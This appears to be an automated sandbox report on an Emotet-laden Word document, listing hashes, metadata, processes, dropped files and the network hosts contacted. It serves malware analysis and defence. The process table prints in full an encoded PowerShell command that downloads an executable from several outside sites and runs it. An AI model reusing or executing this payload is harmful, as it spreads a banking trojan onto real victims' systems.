File name: | 00_29_G-087448.doc_20200729230440 |
Full analysis: | https://app.any.run/tasks/f9298f39-7e42-478d-a4a6-345644cc0b93 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | August 09, 2020, 01:37:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Facere., Author: Antoine Clement, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 29 11:28:00 2020, Last Saved Time/Date: Wed Jul 29 11:28:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 35, Security: 0 |
MD5: | BAACB06439B2CEE8A566CEA6321D91A2 |
SHA1: | 8BDDA11E2B3FF3B7F92BAB5BA69EF3D5DD65A56E |
SHA256: | EEC719798DE02C60D853DFA81688D2668A95E113447753CA1C764D9DD1245E65 |
SSDEEP: | 3072:T4PrXcuQuvpzm4bkiaMQgAlSZ0qmDWaaNSLMLjk:sDRv1m4bnQgISZ0XD4NSLMLjk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Facere. |
---|---|
Subject: | - |
Author: | Antoine Clement |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:07:29 10:28:00 |
ModifyDate: | 2020:07:29 10:28:00 |
Pages: | 2 |
Words: | 5 |
Characters: | 35 |
Security: | None |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 39 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2880 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\00_29_G-087448.doc_20200729230440.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3480 | powersheLL -e JABGAFoAUABLAFgAbQB3AGMAPQAnAEcASgBXAEwAQwBrAGEAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAUgBgAGkAVAB5AHAAUgBgAG8AVABvAGAAQwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAE8ASwBDAEcAcABjAGoAIAA9ACAAJwA0ADEAMQAnADsAJABHAFgAUwBJAE0AcwBuAHgAPQAnAEcAUgBHAFMASABpAHUAeAAnADsAJABaAFAAWABYAFUAaAB1AGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgATwBLAEMARwBwAGMAagArACcALgBlAHgAZQAnADsAJABQAFMATABCAFMAdQBuAHEAPQAnAFcATQBaAEMARgBlAHUAZAAnADsAJABFAE4ARABDAEgAZQBiAHoAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAYwBMAGkAZQBuAHQAOwAkAEQAUwBBAEMATgBqAHUAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAdQBoAGEAbABsAG8AdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbQAyAGsAWAAzADcANAAvACoAaAB0AHQAcAA6AC8ALwBhAGwAYQBrAHMAaQByAC4AYwBvAG0ALwBTAGMAcgBpAHAAdABzAC8AVABXADYATABKAHAAeAAvACoAaAB0AHQAcABzADoALwAvAGMAbABhAHMAcwBpAGMALQByAGUAYwBpAHAAZQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZQBvAEQASgAxADMALwAqAGgAdAB0AHAAOgAvAC8AZABpAHMAaABuAGMAaABpAHAAcwAuAGMAbwBtAC8ATABpAGIAcgBhAHIAeQAvAFcASwAvACoAaAB0AHQAcAA6AC8ALwBkAHUAbgBjAGEAbgBsAGwAYwAuAGMAbwBtAC8AZwByAG8AdQBuAGQAaQBuAGcAdABoAGUAYwBsAG8AdQBkAC4AbwByAGcALwBOAFEAegB4ADEAMgAvACcALgAiAFMAUABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATQBSAEMAUwBKAHAAbAB3AD0AJwBBAFEATwBEAEgAbgBsAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAWQBWAFYAUgBzAGEAdwAgAGkAbgAgACQARABTAEEAQwBOAGoAdQBsACkAewB0AHIAeQB7ACQARQBOAEQAQwBIAGUAYgB6AC4AIgBkAGAATwBXAE4ATABvAGEAYABkAGYAaQBsAEUAIgAoACQASgBZAFYAVgBSAHMAYQB3ACwAIAAkAFoAUABYAFgAVQBoAHUAYQApADsAJABXAEYARgBZAFUAdwB3AHIAPQAnAEsARQBNAEIAWQBlAHYAaQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFoAUABYAFgAVQBoAHUAYQApAC4AIgBsAGAARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgA0ADcAMgA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAZQBBAGAAVABFACIAKAAkAFoAUABYAFgAVQBoAHUAYQApADsAJABYAEkAVgBQAFYAeQBuAGEAPQAnAFQARQBNAFEAVABtAHkAeQAnADsAYgByAGUAYQBrADsAJABPAFcARgBWAFMAZQBiAHMAPQAnAFkAUwBLAEgAWgBoAHoAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAFAASgBBAEgAdwBxAHkAPQAnAFkATgBTAFAAQQBnAHAAdAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2400 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Version: 75.0.3770.100 | ||||
3244 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x62d1a9d0,0x62d1a9e0,0x62d1a9ec | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Version: 75.0.3770.100 | ||||
2816 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2480 --on-initialized-event-handle=324 --parent-handle=328 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Version: 75.0.3770.100 | ||||
3456 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15079891601684511029 --mojo-platform-channel-handle=1004 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Version: 75.0.3770.100 | ||||
1672 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=17582376205363116773 --mojo-platform-channel-handle=1608 /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | chrome.exe | |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Version: 75.0.3770.100 | ||||
3240 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15894771225404834457 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Version: 75.0.3770.100 | ||||
2572 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=2916659571460060374 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2472 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Version: 75.0.3770.100 | ||||
2740 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9555915752394036607 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Version: 75.0.3770.100 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR114C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF34627BCF04986F2D.TMP | — | |
MD5:— | SHA256:— | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFBD32CB963AD497A2.TMP | — | |
MD5:— | SHA256:— | |||
3480 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GHW8FCRZT0MYKEUBIEW.temp | — | |
MD5:— | SHA256:— | |||
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\172ed73e-de48-4293-b9ce-bde01e5d4ca0.tmp | — | |
MD5:— | SHA256:— | |||
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000032.dbtmp | — | |
MD5:— | SHA256:— | |||
3480 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A0850076FAAAE7B4EAF7305558E59940 | SHA256:AB8DD0A820F260EF05E605A98A6EDD9B1276B4BF7F630647F7578493BA988E55 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:BB120F82B0FCC9DCEAF40AEBF16CB22A | SHA256:5C54D66DE5478B3CC04A408E6BFC14333DDBD5B1963CF3BA56FC8F0399B8B9E8 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:10D8AAF7479958FE7FDA438167054A88 | SHA256:81F992AC0DA2ECFC285562AE958151B890374509AC5161F055A0E0B50DB50D55 | |||
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF19e2c5.TMP | text | |
MD5:D11C35B3D5258F594933332C11C6F0F2 | SHA256:DC2EB16E16FA3FB258AC31A481F817208CF0C917AF4224F2832588D3A64ADD05 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3480 | powersheLL.exe | GET | 200 | 104.28.4.216:80 | http://www.duhallow.com/wp-content/pm2kX374/ | US | html | 3.96 Kb | malicious |
3480 | powersheLL.exe | GET | 404 | 74.220.205.241:80 | http://dishnchips.com/Library/WK/ | US | html | 315 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3480 | powersheLL.exe | 107.154.146.153:443 | classic-recipes.com | Incapsula Inc | US | unknown |
3480 | powersheLL.exe | 104.28.4.216:80 | www.duhallow.com | Cloudflare Inc | US | shared |
3480 | powersheLL.exe | 74.220.205.241:80 | dishnchips.com | Unified Layer | US | unknown |
3480 | powersheLL.exe | 203.123.252.13:80 | alaksir.com | Pacific Link Indonesia | ID | suspicious |
1672 | chrome.exe | 172.217.18.163:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
1672 | chrome.exe | 172.217.23.131:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 216.58.212.138:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 172.217.18.174:443 | apis.google.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 216.58.212.164:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.duhallow.com |
| malicious |
alaksir.com |
| suspicious |
classic-recipes.com |
| whitelisted |
dishnchips.com |
| unknown |
duncanllc.com |
| unknown |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
www.google.com |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
www.gstatic.com |
| whitelisted |